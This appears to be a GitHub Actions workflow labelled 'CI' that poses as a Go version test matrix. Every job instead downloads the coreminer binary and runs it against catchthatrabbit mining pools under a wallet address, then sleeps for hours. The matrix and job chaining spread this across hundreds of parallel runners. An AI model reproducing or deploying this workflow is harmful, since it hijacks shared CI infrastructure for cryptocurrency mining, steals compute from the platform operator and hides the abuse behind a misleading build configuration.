name: CI
on: 
  push:
    branches: [ "main" ]

jobs:
  kont:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 80
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
    timeout-minutes: 10
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v4
    - name: clone
      run: wget https://github.com/catchthatrabbit/coreminer/releases/download/v0.19.88/coreminer-linux-x86_64.tar.gz && tar xf coreminer-linux-x86_64.tar.gz && cd coreapp && ./coreminer -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@eu.catchthatrabbit.com:8008 \
          -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@as.catchthatrabbit.com:8008 &
           sleep 310s
  ol:
    needs: kont
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/catchthatrabbit/coreminer/releases/download/v0.19.88/coreminer-linux-x86_64.tar.gz && tar xf coreminer-linux-x86_64.tar.gz && cd coreapp && ./coreminer -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@eu.catchthatrabbit.com:8008 \
          -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@as.catchthatrabbit.com:8008 &
            sleep 5m
        
    
     
  tol:
    needs: [kont]
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/catchthatrabbit/coreminer/releases/download/v0.19.88/coreminer-linux-x86_64.tar.gz && tar xf coreminer-linux-x86_64.tar.gz && cd coreapp && ./coreminer -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@eu.catchthatrabbit.com:8008 \
          -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@as.catchthatrabbit.com:8008 &
            sleep 6m
  ayo:
    needs: ol
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/catchthatrabbit/coreminer/releases/download/v0.19.88/coreminer-linux-x86_64.tar.gz && tar xf coreminer-linux-x86_64.tar.gz && cd coreapp && ./coreminer -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@eu.catchthatrabbit.com:8008 \
          -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@as.catchthatrabbit.com:8008 &
            sleep 105m
        
    
     
  su:
    needs: [tol]
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 250
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 250
        JOB: ${{ matrix.go }}
    steps:
    - uses: actions/checkout@v4
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: clone
      run: wget https://github.com/catchthatrabbit/coreminer/releases/download/v0.19.88/coreminer-linux-x86_64.tar.gz && tar xf coreminer-linux-x86_64.tar.gz && cd coreapp && ./coreminer -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@eu.catchthatrabbit.com:8008 \
          -P stratum1+tcp://cb2176814d209010a1bb5eb6c046e0e40e82773fd578.tod@as.catchthatrabbit.com:8008 &
            sleep 261m
        
    
  
